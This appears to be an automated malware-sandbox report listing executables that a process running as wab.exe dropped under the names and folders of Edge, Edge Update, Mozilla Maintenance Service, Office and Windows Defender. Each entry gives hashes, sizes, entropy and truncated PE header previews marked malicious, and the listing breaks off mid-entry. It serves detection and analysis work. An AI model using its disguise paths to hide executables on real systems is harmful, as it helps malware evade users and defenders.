                                                                              MD5:DF4B1DE5F9CEE22E7C47D5023ED73F23
                                                                              SHA1:38329123EEC0496BBE07B3B274F139E809705943
                                                                              SHA-256:0EF0AD16A9F6E054F3FDDE1DD2984DFCE8F4466F44CA616C78B03577A6ACEC1B
                                                                              SHA-512:8207A1DC020412B5A924665043AF347437825E128122DC93EEF4ED7122D98E0695183637F4D56EDE014EF95235D659A35B5011FB4D701867742090BD3F4308AD
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4251688
                                                                              Entropy (8bit):6.49452169775478
                                                                              Encrypted:false
                                                                              SSDEEP:49152:ppawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BT:+ehFLvTQDpB5oSOmlBl
                                                                              MD5:D7F3BB1C8DDD48162CFB914CC0BD2B28
                                                                              SHA1:7C88DEA6E637E95D486769CAC5195D76D61CAD8D
                                                                              SHA-256:A6578F4E1089C55627499E1EA32386041BFEE10CD3ADB90F9D2098F90A92C99A
                                                                              SHA-512:5B9276369DA9D1962716AF74C3098ABA884FC56E5067A00DCC17A1924204B63EF8250003F50FEC43EC676DDC7357F398017ACDCFB89A4B4B6351394822797237
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1319976
                                                                              Entropy (8bit):6.467419492813544
                                                                              Encrypted:false
                                                                              SSDEEP:12288:+yeb4D2VLtrQA1Yim7XGLZxHwlqxlThfkY8bo0cITiLEpPoVfMA+nkthF2g0oz5:+iD2VmA1YXQHwlklb8boUuWPg2gX
                                                                              MD5:1DA657653D9309EC964A8A4EE00C297F
                                                                              SHA1:EDA6072D4BBB59A9840B746C9A3B51E3FCFF746F
                                                                              SHA-256:FF51B182FA83FE86E0B41327CCB61191DC85DD01E39FE31E9F36F06183795FD5
                                                                              SHA-512:2F37150DB52489D79CE150EB1E29B14F1652244CE7BE7D7B01B179003392DA57D4314207720A59683604A34A192F49E9C8B06405CABAF0CE51657D65BFED1AA0
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2327080
                                                                              Entropy (8bit):6.50909197138894
                                                                              Encrypted:false
                                                                              SSDEEP:24576:AfD3zcv9ZhsSGSQoryOzozU63IqRNhB0kDKPHkkkkkkkBoIeAz:AfD3zO9ZhBGlopzM3HRNr00z
                                                                              MD5:5F13BB2123CD84449668B7BE660E03A1
                                                                              SHA1:C7840723CCCF0A98FA164DE55C97FEAE9BC07103
                                                                              SHA-256:69E2DC86A07D17BD965031B1E39EC2921531EF0DA5AC8DE3939E264A606232DF
                                                                              SHA-512:894BBA05A32679B584297B0E53ACB71DAEDDC63AE4B0247E42DDC873BF83404464386B2B1B38D0020607BF0F1C34210AD629ADC8B88E21A289CDF64E50E4680F
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3790800
                                                                              Entropy (8bit):6.5248807406109455
                                                                              Encrypted:false
                                                                              SSDEEP:49152:UTaRe7mkn5KLvD5qGVC008Jpb4tgLUgGEsLABD5wTQh07yrLMLl9YPhe:3I72LvkrCpbxJRoIMx
                                                                              MD5:4EFF0AAEA467EF4BEA361BBDF3E0C47E
                                                                              SHA1:F6B0C7F4065F41C95C81CC0578AFCBC2352ED2A6
                                                                              SHA-256:C464CD450FB9402368912118E6E5AC38B995032C2FDFE370A7C4FBC351C1673E
                                                                              SHA-512:5E55C90A8FC5C1F12FBC93CAECC3235941087E1B3E7756EF3416E27D8150594DAC47E1530C6B57373A715FD0715872D4B3E1CE3C5FE2D717ED7F33D031E842BE
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1535528
                                                                              Entropy (8bit):6.485837874399157
                                                                              Encrypted:false
                                                                              SSDEEP:12288:A406WoyJHeFOqDRA7uKk+TjnkgiMnQq+UI7MBImQWkv7yfOYIXbwohMA+nkXZnHC:NW9Jml9mmijZiMnF+ZxmQWcbLw8Vi
                                                                              MD5:DEC9D082187C2E2FD9CEC20ED67609C6
                                                                              SHA1:967A517741026C7A019909DD3F49832C3BAEE723
                                                                              SHA-256:7AC72A6466BF243F870520E026999B2920E851DC16DFA44241EAB92F1B371CD2
                                                                              SHA-512:568B47F306872D8B23DA5ACD9419D1A53A3DC3D802157BC74E40B961D0DA70C2BA09B22AC3D24581917020FC0874C12C498390E208BF0FA54714707B422982D3
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1273384
                                                                              Entropy (8bit):6.477930816210187
                                                                              Encrypted:false
                                                                              SSDEEP:12288:U5eN+kL3gVeYt/uakJMtleRO40BbdJrPVJAzAlPY6mYzJuomPMA+nkVogIkd9:UwNHwoYhua6MtERO4qbBJTY6mY1uIgp
                                                                              MD5:D52F2208641A2193606B49DE2AC097C0
                                                                              SHA1:B5AFE076C247DC9D0A51C5D99C9C6870C48E8D3A
                                                                              SHA-256:277C7CB868F05FC05807E1B84B0B01B4B53BAE16BF45576A7A56786FF7087627
                                                                              SHA-512:134102FC9A5D24A0B2E7E273F3027543F2847B6C3D7E6CE1763D54F2D4FA80A3C0A6581F641064C5F878DEB8A541AC773454968C5453090F03F5C2427B3AFE4E
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4251688
                                                                              Entropy (8bit):6.49452169775478
                                                                              Encrypted:false
                                                                              SSDEEP:49152:ppawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BT:+ehFLvTQDpB5oSOmlBl
                                                                              MD5:D7F3BB1C8DDD48162CFB914CC0BD2B28
                                                                              SHA1:7C88DEA6E637E95D486769CAC5195D76D61CAD8D
                                                                              SHA-256:A6578F4E1089C55627499E1EA32386041BFEE10CD3ADB90F9D2098F90A92C99A
                                                                              SHA-512:5B9276369DA9D1962716AF74C3098ABA884FC56E5067A00DCC17A1924204B63EF8250003F50FEC43EC676DDC7357F398017ACDCFB89A4B4B6351394822797237
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1319976
                                                                              Entropy (8bit):6.467419492813544
                                                                              Encrypted:false
                                                                              SSDEEP:12288:+yeb4D2VLtrQA1Yim7XGLZxHwlqxlThfkY8bo0cITiLEpPoVfMA+nkthF2g0oz5:+iD2VmA1YXQHwlklb8boUuWPg2gX
                                                                              MD5:1DA657653D9309EC964A8A4EE00C297F
                                                                              SHA1:EDA6072D4BBB59A9840B746C9A3B51E3FCFF746F
                                                                              SHA-256:FF51B182FA83FE86E0B41327CCB61191DC85DD01E39FE31E9F36F06183795FD5
                                                                              SHA-512:2F37150DB52489D79CE150EB1E29B14F1652244CE7BE7D7B01B179003392DA57D4314207720A59683604A34A192F49E9C8B06405CABAF0CE51657D65BFED1AA0
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1273384
                                                                              Entropy (8bit):6.477930816210187
                                                                              Encrypted:false
                                                                              SSDEEP:12288:U5eN+kL3gVeYt/uakJMtleRO40BbdJrPVJAzAlPY6mYzJuomPMA+nkVogIkd9:UwNHwoYhua6MtERO4qbBJTY6mY1uIgp
                                                                              MD5:D52F2208641A2193606B49DE2AC097C0
                                                                              SHA1:B5AFE076C247DC9D0A51C5D99C9C6870C48E8D3A
                                                                              SHA-256:277C7CB868F05FC05807E1B84B0B01B4B53BAE16BF45576A7A56786FF7087627
                                                                              SHA-512:134102FC9A5D24A0B2E7E273F3027543F2847B6C3D7E6CE1763D54F2D4FA80A3C0A6581F641064C5F878DEB8A541AC773454968C5453090F03F5C2427B3AFE4E
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):225232
                                                                              Entropy (8bit):5.590089703655568
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkBcxiNNpCPPQPg2cluc/Xswbz8cz3quKoNX1gd:YcwVz4B8c37KoNX1q
                                                                              MD5:0822CF9C8E0FBEB192BAF4924558F9EF
                                                                              SHA1:D051B71CC415AAB8760593D963060600EA1D561B
                                                                              SHA-256:68CA5048EBA160EC9CF32A2D8F48007D3559AF1E5540A77F4A8303B5B76C0809
                                                                              SHA-512:6A1BED580C552BACFF1F66CDB92E15015A42559E7771245825C7B63C0D69A1621676E68B2430F6F5D6D2ED87A4F44BFC5B0CE2A9B1F82DA68EB8012A5198F84F
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):247760
                                                                              Entropy (8bit):5.4946983581508615
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk4W4l/DReos0gXf+EvC6C36eCWdMuoB+ISzBqUGxNtvKAbFP3cSEt0phcxAT5U:fl/DRfkTC3dM7B+mCivAT
                                                                              MD5:2FB36922FE765D104C467862052EBEF8
                                                                              SHA1:22A4F92530018C5751DFFC31CEECA92FD6595960
                                                                              SHA-256:255C40122758C9EBBAB4D7EED934874AAC93CA0115EB3908E7D6BF284027B34C
                                                                              SHA-512:7967C653DDB8DCCDD70CACAA3DAF5FB653D070D572F9527798A494B405DD0BB0D9A4F97AD9B370F1BBE2CDBD9C75376682949AAAC9E3AB47687E1536A3D5D6BE
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):142288
                                                                              Entropy (8bit):6.010441905708692
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkE684ePKoTB+IvoAewtxUff8aohGme+YDfYz8FrR7:jrTB+AleYIkifYUF
                                                                              MD5:60B8D642590E6752206C2D4C4572F552
                                                                              SHA1:F90AEEF8450BA2672909E794882E252DAF200FE3
                                                                              SHA-256:0CCA065FD181AAAE1D87076E56FEFBDCE2D6C038550ED6EF7E24A6D377C51F55
                                                                              SHA-512:FB0E15378BEE48594701460890635BD3710C35A43A0B52C3DF2E1A3B7C629541A377BC21C2EAC963667047DC210EEDB66D5AD6B88D98FD4E0A24288F0B60DF21
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):259024
                                                                              Entropy (8bit):5.843284257427227
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rknXEV0tle+5IbvBCMmNginHy8lZoY46Mu/rLogrlKq9YXI35EvMl:sUVwleMITTmNv1ohWsqYI354I
                                                                              MD5:724461D9FADE55B6FB8024A7CECE86BD
                                                                              SHA1:31C171F23D66938373F3E313412E2E27F1FB1F6D
                                                                              SHA-256:BE208C4A573B7067F7368C334ABB45ACA68CE3A6672CD5E47DE908B59880A4CF
                                                                              SHA-512:E1AEB088FD312F5D1EAD891D2FCE7958CB7EDA9099407F875604A39C7B44651179EE6DB97A10C54C7F50A85C5EF404E07278C1A0FFD15AE779C5FAD2391BEAD4
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):305120
                                                                              Entropy (8bit):6.228503123962384
                                                                              Encrypted:false
                                                                              SSDEEP:6144:DFKucTm3RhMfoSG5dCd7hjAOe9UmXY2Gh++CgBlPMoX:xKucTm3RhMfoSBjA9U2Yxh+Zgb7X
                                                                              MD5:53B080AD4D228F74C8CD989A7EA47A1A
                                                                              SHA1:BBA52738C2A06D220B14944DCD48C9C1314115BA
                                                                              SHA-256:C15914A8A2F7504442109FB22FEF3C8C76DC10F5F1621A27D18336CE468616D0
                                                                              SHA-512:425B62091571FFA59B344A4E3E6F17EE7E1D5BFA182D3FE417EA7EC76FBE68330019FAFC17004C227FC90B5D8523FB0C71D61FF9238E67A26E4E48730AB67BFD
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):142288
                                                                              Entropy (8bit):6.011172190675141
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkraivqozB+IvcZ4wrZU+l/8xoAm2+YDfYz8GrR/:OzB+Aw4CZNr2fYLl
                                                                              MD5:CBF0D1C5689D989C73C63890EC44858C
                                                                              SHA1:05CD5077D1E330666851CE83BBC1D97756B8577E
                                                                              SHA-256:ACB8B4B0F65E35309EE1B50C516BDF43679F1D7250C25DA2D8126B7B7920D60A
                                                                              SHA-512:5869DA0F45AE6DCA785DCE0B0619B220C74687BD3CA3E68A01591592301CF26B89FF6CBF5F8FE521CF13809C10093B0865BA53A49A77DD474FBF864819CAD889
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1640416
                                                                              Entropy (8bit):7.892301842372348
                                                                              Encrypted:false
                                                                              SSDEEP:24576:jwy53G70SeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzUG:8y53w24gQu3TPZ2psFkiSqwozX
                                                                              MD5:AA658D62A81B286BF555093E0AAE22B9
                                                                              SHA1:C0C8C8431ABA7EBCA41D047BCAC3BC481759FBCC
                                                                              SHA-256:AA0604845394BED07D335F2A840B3375466BB6707DC0AE45A1D1587D1026567A
                                                                              SHA-512:6F6AA71DABEA96D667E0379D691CE37284FFF7E3814392C5725256E4A9A0091B0C23DF47E04D01FCF13097474A281E8105909DAC9B7DAC98E125A2BBFCA21DC2
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):144866
                                                                              Entropy (8bit):5.808234044484307
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkcRD5b0qZ7y4jem7y6tkNRCywDw1DiJkuKUY:vD5lZ7y4j9KT4DteUY
                                                                              MD5:F9FC6C9198B51079EE2589C189FD0FF2
                                                                              SHA1:AFB098F62B18E858CA1287352D5E0C1F4712BDCA
                                                                              SHA-256:4B64D3577D06DC4C74DB624776BE20600B860D8C8E8CC1F63334AA7156794B69
                                                                              SHA-512:169ED1F88471E03760789A7B5F87AE0682F54628AE74E379377B0D7FFE89EA93B40CB88C8AB59BB8A9F01646A36289C3B681EE18B1E6ADC73A229E9D794DC9E3
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):280480
                                                                              Entropy (8bit):6.179980245461866
                                                                              Encrypted:false
                                                                              SSDEEP:6144:FPr2vXzrEbslNp/JNsJKQl0GkRAqVNf0O3:FDQXRVTZu0GP+ZR
                                                                              MD5:370ADDBC1D77A867416A1AA2BE63DD1F
                                                                              SHA1:48FB1005A536927F94D20B289D2A583FAC85B094
                                                                              SHA-256:FC50096512FB196ED5608FFC49824756C73D5CBD91D2300063C2E99FA2E00E11
                                                                              SHA-512:9ED89D8887229B9D2AAEA4C0FAE4914C7FBB333BE455AF840E3FF4E60BF95895EAF63CBDFAF19A80DCEA737EB8EC902E945AB1B645D8365FD8C2DED8BDB606EC
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4473576
                                                                              Entropy (8bit):6.558895341897284
                                                                              Encrypted:false
                                                                              SSDEEP:98304:/kkCqyDEY7+o3OBvfGVY+40yajyS+9s/pLOq:/kkCqaE68eV+0y8E6L1
                                                                              MD5:4855130B5C1085421920C85105178634
                                                                              SHA1:A33353F42A13A7250D66326F8770A286E5774729
                                                                              SHA-256:8624CD3947C884673C1090CCED557CDAC8075E120C1EB2EF4B9C01B694370AFA
                                                                              SHA-512:97D9889F9385DB775A685A62A52EC371BDEE291ECF4877DF0A6098F01F6BD5226452B3893C002A2914B9AE511837FF8090E6DB297C0CDFE3FADBE49A6101CFE6
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):501656
                                                                              Entropy (8bit):6.206848688272987
                                                                              Encrypted:false
                                                                              SSDEEP:12288:YLH18t6x1hjaNHBlfBVDZS82JninSFVlDW:YLOwxyNHBVEHRiSFVlDW
                                                                              MD5:37449BF94D37C1203B35D7EAEE21566E
                                                                              SHA1:553E7B35481F9087EA91DC99985DA9F9349F60DE
                                                                              SHA-256:54800DA609BCA03BA0EFD3EBA90DEC57E644D69352FA8F905FDA2DB2B8897F11
                                                                              SHA-512:51FC24DFD566AEBAB7051FC2862018DE7840A38D1BE9E092D037BF7D1ECC63821FBE391CE68FA0A4B4239A34A37526EE27D1E5FDA480AE62EAC5B1AE23752BD1
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1637776
